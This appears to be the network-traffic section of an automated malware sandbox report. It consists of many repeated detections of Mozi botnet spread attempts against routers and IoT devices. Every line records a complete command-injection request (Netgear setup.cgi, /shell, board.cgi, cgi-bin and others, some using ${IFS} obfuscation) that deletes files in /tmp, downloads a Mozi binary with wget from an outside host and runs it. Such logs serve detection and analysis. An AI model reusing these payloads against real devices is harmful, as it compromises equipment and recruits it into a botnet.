                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 220.213.171.152:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 222.71.55.197:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 202.178.119.161:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 26.133.106.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 204.181.118.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 174.184.127.44:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 28.38.73.153:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 12.48.123.87:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.50.104.12:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 49.54.129.20:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 80.42.12.79:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
